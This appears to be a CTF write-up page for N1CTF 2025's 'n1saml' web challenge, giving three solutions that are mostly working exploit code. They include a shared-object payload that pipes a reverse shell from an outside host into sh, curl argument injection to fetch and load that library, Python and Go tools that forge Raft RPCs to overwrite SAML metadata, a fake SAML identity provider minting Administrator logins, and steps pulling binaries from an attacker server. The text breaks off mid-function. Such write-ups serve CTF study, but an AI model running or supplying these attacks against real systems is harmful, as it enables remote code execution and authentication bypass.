Skip to content

Categories

Curl

we can use like {} below to bypass blacklistin curl we can use -k option without any space to specify a curl config fileexample in htbctf 2024 challenge percetron https://trixterthetux.notion.site/HTB...

Created

Updated

15 min read

Reading time

1 categories

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

CURL RCE and kind off kvstore something challenge, i think its cloud SAML challenge

Event NameN1CTF 2025
GitHub URLhttps://github.com/Nu1LCTF/n1ctf-2025/tree/main/web
Challenge Namen1saml
Attachments
References

solution 1

n1saml:

curl命令行参数注入RCE之后不就随便打了,raft又没鉴权,伪造协议发包直接给metadata改了就能随便伪造用户了

curl RCE: 下载一个so,用engine参数加载就行,给内网端口映射出来方便后面打

#include <stdlib.h>

__attribute__((constructor))
static void rce_init(void) {
    system("curl https://reverse-shell.sh/156.239.238.102:9999 | sh");
}
import requests

target = 'http://60.205.163.215:15481'

url = f'{target}/healthcheck'
data = {
    '--resolve': 'sp:9000:0.0.0.0',
    '-o': '/dev/null',
    '--next': '-s',
    '--url': 'http://156.239.238.102:8000/evil.so',
    '-s': '-o',
    '/tmp/evil.so': '',
}
r = requests.post(url, json=data)
print(r.text)

data = {
    '--engine': '/tmp/evil.so',
}
r = requests.post(url, json=data)
print(r.text)

伪造leader节点给raft集群的每个节点发高权重的log写入rpc,实现metadata篡改

<EntityDescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2025-12-10T05:23:26.991Z" cacheDuration="PT48H" entityID="https://idp.loums.cc/metadata">
  <IDPSSODescriptor xmlns="urn:oasis:names:tc:SAML:2.0:metadata" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
    <KeyDescriptor use="signing">
      <KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
        <X509Data xmlns="http://www.w3.org/2000/09/xmldsig#">
          <X509Certificate xmlns="http://www.w3.org/2000/09/xmldsig#">MIIDBTCCAe2gAwIBAgIUbInAECRGfm3CJpJXsM1coF2apiowDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHRmFrZUlkUDAeFw0yNTExMDEyMzQxMzVaFw0yNjExMDEyMzQxMzVaMBIxEDAOBgNVBAMMB0Zha2VJZFAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrwswwXjPhkYnct983x4TGTSsl21I+cZ0KzL6Tjyrw66GSTNdXu8DXAl9ARBtCphGJLpns8cYAAEtcXT3gAbLjUgpc5Sfd6+S1NaFllGYfeN5bGwwx84NB772C5CbcM9GSm/2RWHsnMt7oCE2PJKijLQbIFiFQ3TdkumUo3I56AcaAEbJeX5mObcA4enhk4JtqBcJSIlfZzRbtI8VmwZSQdThsHu1riQ1qC+4M8u5u8/NC2AG1SjmKgIKpdJNtrYWjpQUkFja99AjU0Dz5SKmXwR/FCBsMdb/RMQgGsYeaFo+nO+FhzeHbTeHdDGL3LqJY99+FG648GoQ7ULcO1mz9AgMBAAGjUzBRMB0GA1UdDgQWBBTh3trctVjkNT/xNijOd9EP3Rl1XDAfBgNVHSMEGDAWgBTh3trctVjkNT/xNijOd9EP3Rl1XDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQByA4MeIz+JSNR1usnUcKStqaKqUpeeuGA3T39ZqGyCInTG+yIJbuwy7ghwVdp1h4eVzpr3v7O+lVqE2kdW7O/aASz7BXTqPNDMCMm5r9vXTENN/ENxZWx3Osu14zhyYLP22zTytMt11641i5gh1NsKq/pop4Qnz4ULh+mb2yP3oWy//IarUQLIxTaxZYBYWx3qSGxvqcyuBEvfmuGX77ju3yZpakNRz/1zvD/sbNeQYnf8zOwgqMNP9Es7+F0SuKzMDXpSTXN3wHg3RED5PdUYuGMRVL7DpYTGlICJfNpiB+TCzKwkDINHOBJ7Q7L/YUOPLVwh+MmOKFcGQn9NyTr5</X509Certificate>
        </X509Data>
      </KeyInfo>
    </KeyDescriptor>
    <KeyDescriptor use="encryption">
      <KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#">
        <X509Data xmlns="http://www.w3.org/2000/09/xmldsig#">
          <X509Certificate xmlns="http://www.w3.org/2000/09/xmldsig#">MIIDBTCCAe2gAwIBAgIUbInAECRGfm3CJpJXsM1coF2apiowDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHRmFrZUlkUDAeFw0yNTExMDEyMzQxMzVaFw0yNjExMDEyMzQxMzVaMBIxEDAOBgNVBAMMB0Zha2VJZFAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrwswwXjPhkYnct983x4TGTSsl21I+cZ0KzL6Tjyrw66GSTNdXu8DXAl9ARBtCphGJLpns8cYAAEtcXT3gAbLjUgpc5Sfd6+S1NaFllGYfeN5bGwwx84NB772C5CbcM9GSm/2RWHsnMt7oCE2PJKijLQbIFiFQ3TdkumUo3I56AcaAEbJeX5mObcA4enhk4JtqBcJSIlfZzRbtI8VmwZSQdThsHu1riQ1qC+4M8u5u8/NC2AG1SjmKgIKpdJNtrYWjpQUkFja99AjU0Dz5SKmXwR/FCBsMdb/RMQgGsYeaFo+nO+FhzeHbTeHdDGL3LqJY99+FG648GoQ7ULcO1mz9AgMBAAGjUzBRMB0GA1UdDgQWBBTh3trctVjkNT/xNijOd9EP3Rl1XDAfBgNVHSMEGDAWgBTh3trctVjkNT/xNijOd9EP3Rl1XDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQByA4MeIz+JSNR1usnUcKStqaKqUpeeuGA3T39ZqGyCInTG+yIJbuwy7ghwVdp1h4eVzpr3v7O+lVqE2kdW7O/aASz7BXTqPNDMCMm5r9vXTENN/ENxZWx3Osu14zhyYLP22zTytMt11641i5gh1NsKq/pop4Qnz4ULh+mb2yP3oWy//IarUQLIxTaxZYBYWx3qSGxvqcyuBEvfmuGX77ju3yZpakNRz/1zvD/sbNeQYnf8zOwgqMNP9Es7+F0SuKzMDXpSTXN3wHg3RED5PdUYuGMRVL7DpYTGlICJfNpiB+TCzKwkDINHOBJ7Q7L/YUOPLVwh+MmOKFcGQn9NyTr5</X509Certificate>
        </X509Data>
      </KeyInfo>
      <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"></EncryptionMethod>
      <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes192-cbc"></EncryptionMethod>
      <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes256-cbc"></EncryptionMethod>
      <EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"></EncryptionMethod>
    </KeyDescriptor>
    <NameIDFormat>urn:oasis:names:tc:SAML:2.0:nameid-format:transient</NameIDFormat>
    <SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="http://202.112.47.65:59991/sso"></SingleSignOnService>
    <SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Location="http://202.112.47.65:59991/sso"></SingleSignOnService>
  </IDPSSODescriptor>
</EntityDescriptor>
import json
import socket
from typing import Optional, Tuple
import base64
import msgpack


RPC_APPEND_ENTRIES = 0x00
DEFAULT_PROTOCOL_VERSION = 3
LOG_TYPE_COMMAND = 0


def build_command(key: str, value: str) -> bytes:
    payload = {"op": "set", "key": key, "value": value}
    return json.dumps(payload, separators=(",", ":")).encode()


def make_entry(index: int, term: int, command_blob: bytes):
    return {
        "Index": index,
        "Term": term,
        "Type": LOG_TYPE_COMMAND,
        "Data": command_blob,
        "Extensions": None,
    }


def craft_append_entries(term: int,
                         prev_index: int,
                         prev_term: int,
                         commit_index: int,
                         entry_index: Optional[int],
                         fake_id: str,
                         fake_addr: str,
                         command_blob: Optional[bytes]):
    entries = []
    if command_blob is not None and entry_index is not None:
        entries.append(make_entry(entry_index, term, command_blob))

    request = {
        "ProtocolVersion": DEFAULT_PROTOCOL_VERSION,
        "Term": term,
        "LeaderCommitIndex": commit_index,
        "PrevLogEntry": prev_index,
        "PrevLogTerm": prev_term,
        "Entries": entries,
        "ID": fake_id.encode(),
        "Addr": fake_addr.encode(),
        "Leader": fake_addr.encode(),
    }

    packed = msgpack.packb(request, use_bin_type=True)
    return bytes([RPC_APPEND_ENTRIES]) + packed


def _decode_msgpack_objects(unpacker: msgpack.Unpacker, required: int) -> list:
    objects = []
    for obj in unpacker:
        objects.append(obj)
        if len(objects) >= required:
            break
    return objects


def send_rpc(host: str, port: int, payload: bytes) -> Tuple[str, dict]:
    with socket.create_connection((host, port), timeout=3) as sock:
        sock.sendall(payload)
        sock.shutdown(socket.SHUT_WR)
        sock.settimeout(3)

        unpacker = msgpack.Unpacker(raw=False)
        objects = []

        try:
            while len(objects) < 2:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                unpacker.feed(chunk)
                objects.extend(_decode_msgpack_objects(unpacker, 2 - len(objects)))
        except socket.timeout as exc:
            raise RuntimeError(f"raft RPC read timed out from {host}:{port}") from exc

        if len(objects) < 2:
            raise RuntimeError(f"incomplete RPC response from {host}:{port}: {objects!r}")

        rpc_error = objects[0]
        if isinstance(rpc_error, bytes):
            rpc_error = rpc_error.decode(errors="replace")
        response = objects[1]
        return rpc_error, response


def probe_node(host: str, port: int, fake_id: str, fake_addr: str) -> Tuple[int, int]:
    probe_payload = craft_append_entries(
        term=0,
        prev_index=0,
        prev_term=0,
        commit_index=0,
        entry_index=None,
        fake_id=fake_id,
        fake_addr=fake_addr,
        command_blob=None,
    )
    rpc_error, response = send_rpc(host, port, probe_payload)
    if rpc_error:
        raise RuntimeError(f"probe failed on {host}:{port} -> {rpc_error}")

    term = response.get("Term", 0)
    last_log = response.get("LastLog", 0)
    if term == 0:
        term = 1  # fall back to non-zero term for the next append
    return term, last_log


def exploit_node(host: str,
                 port: int,
                 fake_id: str,
                 fake_addr: str,
                 key: str,
                 value: str):
    term, last_log = probe_node(host, port, fake_id, fake_addr)
    print(term, last_log)
    entry_index = last_log + 1
    command_blob = build_command(key, value)

    payload = craft_append_entries(
        term=term+1,
        prev_index=0,
        prev_term=0,
        commit_index=entry_index,
        entry_index=entry_index,
        fake_id=fake_id,
        fake_addr=fake_addr,
        command_blob=command_blob,
    )

    rpc_error, response = send_rpc(host, port, payload)
    return term, entry_index, rpc_error, response


def parse_target(target: str) -> Tuple[str, int]:
    host, port = target.rsplit(":", 1)
    return host, int(port)


# ---------------- exploit configuration ----------------
TARGETS = [
    "156.239.238.102:12380",
    "156.239.238.102:22380",
    "156.239.238.102:32380",
]

FAKE_ID = "node3"
FAKE_ADDR = "0.0.0.0:32380"
KEY = "metadata"
VALUE = base64.b64encode(open('idp-metadata.xml', 'rb').read()).decode()
# -------------------------------------------------------


def run():
    for target in TARGETS:
        host, port = parse_target(target)
        try:
            term, entry_index, rpc_error, response = exploit_node(
                host=host,
                port=port,
                fake_id=FAKE_ID,
                fake_addr=FAKE_ADDR,
                key=KEY,
                value=VALUE,
            )
            print(f"[+] {target} term={term} entry={entry_index} rpc_error={rpc_error!r} response={response}")
        except Exception as exc:
            print(f"[-] {target} failed: {exc}")


if __name__ == "__main__":
    run()

vibe code一个fake idp server伪造登录信息

#!/usr/bin/env python3
"""Minimal SAML IdP emulator driven by idp-metadata.xml."""

import argparse
import base64
import datetime as dt
import html
import logging
import textwrap
import uuid
import zlib
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from typing import Optional
from urllib.parse import parse_qs, urlparse

try:
    from lxml import etree
    from signxml import XMLSigner, methods
except ImportError as exc:
    raise SystemExit(
        "Required packages missing. Install dependencies with "
        "`python3 -m pip install lxml signxml`."
    ) from exc


NS = {
    "md": "urn:oasis:names:tc:SAML:2.0:metadata",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
    "samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
}


class FakeIdentityProvider:
    def __init__(self, metadata_path: Path, key_path: Path):
        self.metadata_xml = metadata_path.read_bytes()
        self.metadata_tree = etree.fromstring(self.metadata_xml)
        self.entity_id = self.metadata_tree.get("entityID")
        self.response_binding_path = self._resolve_sso_path()
        self.cert_pem = self._read_cert_from_metadata()
        self.private_key_pem = key_path.read_text()

    def _resolve_sso_path(self) -> str:
        sso = self.metadata_tree.find(".//md:SingleSignOnService", namespaces=NS)
        if sso is None:
            raise ValueError("metadata has no SingleSignOnService")
        location = urlparse(sso.get("Location", ""))
        return location.path or "/sso"

    def _read_cert_from_metadata(self) -> str:
        cert_b64 = self.metadata_tree.findtext(
            ".//md:KeyDescriptor[@use='signing']/ds:KeyInfo/ds:X509Data/ds:X509Certificate",
            namespaces=NS,
        )
        if not cert_b64:
            raise ValueError("metadata has no signing certificate")

        wrapped = "\n".join(textwrap.wrap(cert_b64.strip(), 64))
        return f"-----BEGIN CERTIFICATE-----\n{wrapped}\n-----END CERTIFICATE-----\n"

    @staticmethod
    def _decode_saml_request(encoded: str) -> etree._Element:
        raw = base64.b64decode(encoded)
        try:
            inflated = zlib.decompress(raw, -15)
        except zlib.error:
            inflated = raw
        return etree.fromstring(inflated)

    def build_response(
        self,
        saml_request_b64: str,
        relay_state: Optional[str],
    ) -> tuple[str, str]:
        authn_request = self._decode_saml_request(saml_request_b64)
        print(etree.tostring(authn_request, pretty_print=True).decode())
        acs_url = authn_request.get("AssertionConsumerServiceURL")
        if not acs_url:
            acs_url = authn_request.get("Destination")
        if not acs_url:
            raise ValueError("AuthnRequest missing AssertionConsumerServiceURL/Destination")

        request_id = authn_request.get("ID")
        audience = authn_request.findtext(".//saml:Issuer", namespaces=NS) or ""
        nameid_format = "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"
        nameid_value = "Administrator"
        nameid_policy = authn_request.find(".//samlp:NameIDPolicy", namespaces=NS)
        if nameid_policy is not None:
            requested_format = nameid_policy.get("Format")
            if requested_format:
                nameid_format = requested_format
        if nameid_format == "urn:oasis:names:tc:SAML:2.0:nameid-format:transient":
            nameid_value = f"_{uuid.uuid4()}"

        now = dt.datetime.utcnow()
        not_on_or_after = now + dt.timedelta(minutes=360)

        response_id = f"_{uuid.uuid4()}"
        assertion_id = f"_{uuid.uuid4()}"

        response = etree.Element(
            "{urn:oasis:names:tc:SAML:2.0:protocol}Response",
            ID=response_id,
            Version="2.0",
            IssueInstant=now.strftime("%Y-%m-%dT%H:%M:%SZ"),
            Destination=acs_url,
        )
        if request_id:
            response.set("InResponseTo", request_id)

        issuer = etree.SubElement(response, "{urn:oasis:names:tc:SAML:2.0:assertion}Issuer")
        issuer.text = self.entity_id

        status = etree.SubElement(response, "{urn:oasis:names:tc:SAML:2.0:protocol}Status")
        etree.SubElement(
            status,
            "{urn:oasis:names:tc:SAML:2.0:protocol}StatusCode",
            Value="urn:oasis:names:tc:SAML:2.0:status:Success",
        )

        assertion = etree.SubElement(
            response,
            "{urn:oasis:names:tc:SAML:2.0:assertion}Assertion",
            ID=assertion_id,
            IssueInstant=now.strftime("%Y-%m-%dT%H:%M:%SZ"),
            Version="2.0",
        )

        assertion_issuer = etree.SubElement(
            assertion, "{urn:oasis:names:tc:SAML:2.0:assertion}Issuer"
        )
        assertion_issuer.text = self.entity_id

        subject = etree.SubElement(assertion, "{urn:oasis:names:tc:SAML:2.0:assertion}Subject")
        name_id = etree.SubElement(
            subject,
            "{urn:oasis:names:tc:SAML:2.0:assertion}NameID",
            Format=nameid_format,
        )
        name_id.text = nameid_value

        confirmation = etree.SubElement(
            subject,
            "{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmation",
            Method="urn:oasis:names:tc:SAML:2.0:cm:bearer",
        )
        confirmation_data = etree.SubElement(
            confirmation,
            "{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmationData",
            NotOnOrAfter=not_on_or_after.strftime("%Y-%m-%dT%H:%M:%SZ"),
            Recipient=acs_url,
        )
        if request_id:
            confirmation_data.set("InResponseTo", request_id)

        conditions = etree.SubElement(
            assertion,
            "{urn:oasis:names:tc:SAML:2.0:assertion}Conditions",
            NotBefore=(now - dt.timedelta(minutes=360)).strftime("%Y-%m-%dT%H:%M:%SZ"),
            NotOnOrAfter=not_on_or_after.strftime("%Y-%m-%dT%H:%M:%SZ"),
        )
        if audience:
            audience_restriction = etree.SubElement(
                conditions, "{urn:oasis:names:tc:SAML:2.0:assertion}AudienceRestriction"
            )
            audience_el = etree.SubElement(
                audience_restriction,
                "{urn:oasis:names:tc:SAML:2.0:assertion}Audience",
            )
            audience_el.text = audience

        authn_statement = etree.SubElement(
            assertion,
            "{urn:oasis:names:tc:SAML:2.0:assertion}AuthnStatement",
            AuthnInstant=now.strftime("%Y-%m-%dT%H:%M:%SZ"),
            SessionIndex=f"_{uuid.uuid4()}",
            SessionNotOnOrAfter=not_on_or_after.strftime("%Y-%m-%dT%H:%M:%SZ"),
        )
        authn_context = etree.SubElement(
            authn_statement, "{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContext"
        )
        etree.SubElement(
            authn_context,
            "{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextClassRef",
        ).text = "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"

        attribute_statement = etree.SubElement(
            assertion, "{urn:oasis:names:tc:SAML:2.0:assertion}AttributeStatement"
        )
        for name, value in (("uid", "Administrator"), ("mail", "admin@nu1l.com")):
            attribute = etree.SubElement(
                attribute_statement,
                "{urn:oasis:names:tc:SAML:2.0:assertion}Attribute",
                Name=name,
            )
            attribute_value = etree.SubElement(
                attribute,
                "{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue",
            )
            attribute_value.text = value

        signer = XMLSigner(
            method=methods.enveloped,
            signature_algorithm="rsa-sha256",
            digest_algorithm="sha256",
        )
        signed = signer.sign(
            response,
            key=self.private_key_pem,
            cert=self.cert_pem,
            reference_uri=response_id,
        )
        signature = signed.find("{http://www.w3.org/2000/09/xmldsig#}Signature")
        if signature is not None:
            signed.remove(signature)
            signed.insert(1, signature)

        print('---')
        print(etree.tostring(signed, xml_declaration=False, encoding="utf-8").decode())

        saml_response = base64.b64encode(
            etree.tostring(signed, xml_declaration=False, encoding="utf-8")
        ).decode()
        return saml_response, acs_url


def build_handler(idp: FakeIdentityProvider):
    class Handler(BaseHTTPRequestHandler):
        server_version = "FakeIdP/0.1"

        def do_GET(self):  # noqa: N802
            parsed = urlparse(self.path)
            if parsed.path == "/metadata":
                self._serve_metadata()
                return
            if parsed.path == idp.response_binding_path:
                params = parse_qs(parsed.query)
                self._serve_sso(
                    saml_request=params.get("SAMLRequest", [""])[0],
                    relay_state=params.get("RelayState", [None])[0],
                )
                return
            self.send_error(HTTPStatus.NOT_FOUND, "Not Found")

        def do_POST(self):  # noqa: N802
            parsed = urlparse(self.path)
            if parsed.path == idp.response_binding_path:
                length = int(self.headers.get("Content-Length", "0"))
                body = self.rfile.read(length).decode()
                params = parse_qs(body)
                self._serve_sso(
                    saml_request=params.get("SAMLRequest", [""])[0],
                    relay_state=params.get("RelayState", [None])[0],
                )
                return
            self.send_error(HTTPStatus.NOT_FOUND, "Not Found")

        def log_message(self, fmt: str, *args):
            logging.info("%s - - %s", self.address_string(), fmt % args)

        def _serve_metadata(self):
            self.send_response(HTTPStatus.OK)
            self.send_header("Content-Type", "application/samlmetadata+xml")
            self.send_header("Content-Length", str(len(idp.metadata_xml)))
            self.end_headers()
            self.wfile.write(idp.metadata_xml)

        def _serve_sso(self, saml_request: str, relay_state: Optional[str]):
            if not saml_request:
                self.send_error(HTTPStatus.BAD_REQUEST, "Missing SAMLRequest")
                return

            try:
                saml_response, acs_url = idp.build_response(saml_request, relay_state)
            except Exception as exc:  # pylint: disable=broad-except
                logging.exception("Failed to craft response: %s", exc)
                self.send_error(HTTPStatus.INTERNAL_SERVER_ERROR, str(exc))
                return

            html_body = [
                "<!DOCTYPE html>",
                "<html>",
                "<body onload=\"document.forms[0].submit()\">",
                "<form method=\"post\" action=\"%s\">"
                % html.escape("http://156.239.238.102:9000/saml/acs", quote=True),
                "<input type=\"hidden\" name=\"SAMLResponse\" value=\"%s\"/>"
                % html.escape(saml_response, quote=True),
            ]
            if relay_state is not None:
                html_body.append(
                    "<input type=\"hidden\" name=\"RelayState\" value=\"%s\"/>"
                    % html.escape(relay_state, quote=True)
                )
            html_body.extend(
                [
                    "<noscript><p>JavaScript required. Submit the form manually.</p>"
                    "<button type=\"submit\">Continue</button></noscript>",
                    "</form>",
                    "</body>",
                    "</html>",
                ]
            )
            body = "\n".join(html_body).encode()

            self.send_response(HTTPStatus.OK)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    return Handler


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(description="Serve a fake SAML IdP.")
    parser.add_argument("--metadata", default="idp-metadata.xml", type=Path)
    parser.add_argument("--key", default="idp.key", type=Path)
    parser.add_argument("--host", default="0.0.0.0")
    parser.add_argument("--port", default=8001, type=int)
    return parser.parse_args()


def main():
    args = parse_args()
    logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")

    idp = FakeIdentityProvider(args.metadata, args.key)
    handler = build_handler(idp)

    with HTTPServer((args.host, args.port), handler) as server:
        logging.info(
            "Fake IdP ready at http://%s:%d%s (metadata: /metadata)",
            args.host,
            args.port,
            idp.response_binding_path,
        )
        server.serve_forever()


if __name__ == "__main__":
    main()

最后访问映射出来的 sp 服务 /whoami 拿flag

Image
solution 2

https://github.com/Nu1LCTF/n1ctf-2025/tree/main/web/n1saml/exploit

N1SAML Exploit

Detailed writeup: https://exp10it.io/2025/11/breaking-raft-consensus-in-go-n1saml-writeup-for-n1ctf-2025/

on attacker's machine

# build kvstore
pushd kvstore
GOOS=linux GOARCH=amd64 go build -o kvstore main.go
mv kvstore ../kvstore_hijack_amd64
popd

# build idp
pushd idp
GOOS=linux GOARCH=amd64 go build -o idp main.go
mv idp ../idp_amd64
cp idp.key ../idp.key
cp idp.crt ../idp.crt
popd

# build evil.so
docker run -v `pwd`:/build -it --platform=linux/amd64 --rm debian:bookworm-slim bash -c "apt update && apt install -y gcc && cd /build && gcc -fPIC -shared -o evil.so evil.c"

# rename evil.so to index.html
mv evil.so index.html

# host web server
simplehttpserver -listen 0.0.0.0:5555

on victim's machine

HOST=$(hostname -i)

# download binaries
curl <http://VPS:5555/kvstore_hijack_amd64> -o kvstore_hijack
curl <http://VPS:5555/idp_amd64> -o idp
curl <http://VPS:5555/idp.key> -o idp.key
curl <http://VPS:5555/idp.crt> -o idp.crt

# start idp
./idp > idp.log 2>&1 &

# save idp-metadata.xml
curl <http://$HOST:9001/metadata> -o idp-metadata.xml

# start kvstore
./kvstore_hijack -id evil -haddr 0.0.0.0:2333 -raddr $HOST:4444 -paddrs node1:$HOST:12380,node2:$HOST:22380,node3:$HOST:32380,evil:$HOST:4444 > kvstore.log 2>&1 &

# check the result
curl <http://$HOST:2379/status>
curl <http://$HOST:2379/key/metadata> | base64 -d
curl <http://$HOST:9000/whoami> -v
solution 3

For SAML, I used curl sp --url <http://server> -o /tmp/payload --output /tmp/payload + curl sp --url telnet://raftnode --upload-file /tmp/payload -T /tmp/payload for SSRF, and use a large term to become the leader and change the metadata. I believe that I've managed to change the metadata at local, but I didn't have time to do the rest or verify it on remote. This is a vibe-coded script I used for local testing.

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"log"
	"net"
	"net/http"
	"os"
	"sync"
	"time"

	"github.com/hashicorp/go-msgpack/v2/codec"
)

// Raft RPC types
const (
	rpcAppendEntries uint8 = 0
	rpcRequestVote   uint8 = 1
)

// RPCHeader matches hashicorp/raft RPCHeader
type RPCHeader struct {
	ProtocolVersion uint64
	ID              []byte
	Addr            []byte
}

// RequestVoteRequest matches hashicorp/raft
type RequestVoteRequest struct {
	RPCHeader
	Term               uint64
	Candidate          []byte
	LastLogIndex       uint64
	LastLogTerm        uint64
	LeadershipTransfer bool
}

// AppendEntriesRequest matches hashicorp/raft
type AppendEntriesRequest struct {
	RPCHeader
	Term              uint64
	Leader            []byte
	PrevLogEntry      uint64
	PrevLogTerm       uint64
	Entries           []Log
	LeaderCommitIndex uint64
}

// Log entry structure
type Log struct {
	Index      uint64
	Term       uint64
	Type       uint8
	Data       []byte
	Extensions []byte
	AppendedAt time.Time
}

// Command structure for kvstore
type Command struct {
	Op    string `json:"op"`
	Key   string `json:"key"`
	Value string `json:"value"`
}

var msgpackHandle = &codec.MsgpackHandle{}

// HTTP server to host binary payloads
type PayloadServer struct {
	payloads      map[string][]byte
	mu            sync.Mutex
	bindAddr      string // Address to bind to (e.g., "0.0.0.0:1337")
	advertiseAddr string // Address advertised to clients (e.g., "172.17.0.1:1337")
}

func NewPayloadServer(bindAddr, advertiseAddr string) *PayloadServer {
	return &PayloadServer{
		payloads:      make(map[string][]byte),
		bindAddr:      bindAddr,
		advertiseAddr: advertiseAddr,
	}
}

func (ps *PayloadServer) AddPayload(name string, data []byte) {
	ps.mu.Lock()
	defer ps.mu.Unlock()
	ps.payloads[name] = data
}

func (ps *PayloadServer) Start() error {
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		path := r.URL.Path[1:] // Remove leading /
		ps.mu.Lock()
		data, ok := ps.payloads[path]
		ps.mu.Unlock()

		if !ok {
			http.NotFound(w, r)
			return
		}

		w.Header().Set("Content-Type", "application/octet-stream")
		w.Write(data)
	})

	log.Printf("[*] Starting payload HTTP server on %s (advertised as %s)", ps.bindAddr, ps.advertiseAddr)
	go http.ListenAndServe(ps.bindAddr, nil)
	time.Sleep(100 * time.Millisecond) // Give server time to start
	return nil
}

func (ps *PayloadServer) GetAdvertiseAddr() string {
	return ps.advertiseAddr
}

func main() {
	if len(os.Args) < 5 {
		fmt.Println("Usage: curl_injection <healthcheck_url> <attacker_id> <attacker_addr> <payload_server_addr>")
		fmt.Println("Example: curl_injection http://localhost:8080/healthcheck node1 172.18.0.2:12380 172.18.0.1:1337")
		os.Exit(1)
	}

	healthcheckURL := os.Args[1]
	attackerID := []byte(os.Args[2])
	attackerAddr := []byte(os.Args[3])
	payloadServerAddr := os.Args[4]

	log.Println("[*] Starting Raft attack via curl command injection")
	log.Printf("[*] Healthcheck URL: %s", healthcheckURL)
	log.Printf("[*] Attacker Identity: ID=%s, Addr=%s", string(attackerID), string(attackerAddr))
	log.Printf("[*] Payload server: %s", payloadServerAddr)

	// Start HTTP server to host payloads
	// Extract port from payloadServerAddr and bind to 0.0.0.0:<port>
	_, port, err := net.SplitHostPort(payloadServerAddr)
	if err != nil {
		log.Fatalf("[-] Invalid payload server address: %v", err)
	}
	bindAddr := "0.0.0.0:" + port
	payloadServer := NewPayloadServer(bindAddr, payloadServerAddr)
	if err := payloadServer.Start(); err != nil {
		log.Fatalf("[-] Failed to start payload server: %v", err)
	}

	// Prepare malicious metadata
	maliciousMetadata := "HACKED_BY_ATTACKER_" + time.Now().Format(time.RFC3339)
	log.Printf("[*] Malicious metadata: %s", maliciousMetadata)

	attackTerm := uint64(1000)
	raftPorts := []int{12380, 22380, 32380}

	// Step 1: Send RequestVote to all nodes
	log.Printf("[*] Sending RequestVote with Term=%d to all nodes...", attackTerm)
	for i, port := range raftPorts {
		// Build and host the payload
		payload, err := buildRequestVotePayload(attackerID, attackerAddr, attackTerm)
		if err != nil {
			log.Printf("[-] Failed to build RequestVote payload: %v", err)
			continue
		}

		payloadName := fmt.Sprintf("vote_%d", port)
		payloadServer.AddPayload(payloadName, payload)

		if err := sendPayloadViaCurl(healthcheckURL, payloadServer.GetAdvertiseAddr(), payloadName, "kvstore", port); err != nil {
			log.Printf("[-] RequestVote to node %d failed: %v", i+1, err)
		} else {
			log.Printf("[+] RequestVote sent to node %d", i+1)
		}
	}

	// Wait for election to process
	time.Sleep(500 * time.Millisecond)
	log.Println("[+] Election phase completed")

	// Step 2: Send AppendEntries to all nodes
	log.Println("[*] Sending malicious AppendEntries to all nodes...")
	for i, port := range raftPorts {
		// Build and host the payload
		payload, err := buildAppendEntriesPayload(attackerID, attackerAddr, attackTerm, maliciousMetadata)
		if err != nil {
			log.Printf("[-] Failed to build AppendEntries payload: %v", err)
			continue
		}

		payloadName := fmt.Sprintf("append_%d", port)
		payloadServer.AddPayload(payloadName, payload)

		if err := sendPayloadViaCurl(healthcheckURL, payloadServer.GetAdvertiseAddr(), payloadName, "kvstore", port); err != nil {
			log.Printf("[-] AppendEntries to node %d failed: %v", i+1, err)
		} else {
			log.Printf("[+] AppendEntries sent to node %d", i+1)
		}
	}

	log.Println("[+] Attack completed!")
	log.Println("[*] Wait a few seconds, then check metadata via HTTP to verify success")
}

func buildRequestVotePayload(attackerID, attackerAddr []byte, term uint64) ([]byte, error) {
	req := &RequestVoteRequest{
		RPCHeader: RPCHeader{
			ProtocolVersion: 3,
			ID:              attackerID,
			Addr:            attackerAddr,
		},
		Term:               term,
		Candidate:          attackerAddr,
		LastLogIndex:       3,
		LastLogTerm:        term,
		LeadershipTransfer: false,
	}

	var buf bytes.Buffer
	buf.WriteByte(rpcRequestVote) // RPC type byte

	encoder := codec.NewEncoder(&buf, msgpackHandle)
	if err := encoder.Encode(req); err != nil {
		return nil, fmt.Errorf("encode failed: %v", err)
	}

	return buf.Bytes(), nil
}

func buildAppendEntriesPayload(attackerID, attackerAddr []byte, term uint64, maliciousValue string) ([]byte, error) {
	cmd := Command{
		Op:    "set",
		Key:   "metadata",
		Value: maliciousValue,
	}
	cmdData, err := json.Marshal(cmd)
	if err != nil {
		return nil, fmt.Errorf("marshal command failed: %v", err)
	}

	req := &AppendEntriesRequest{
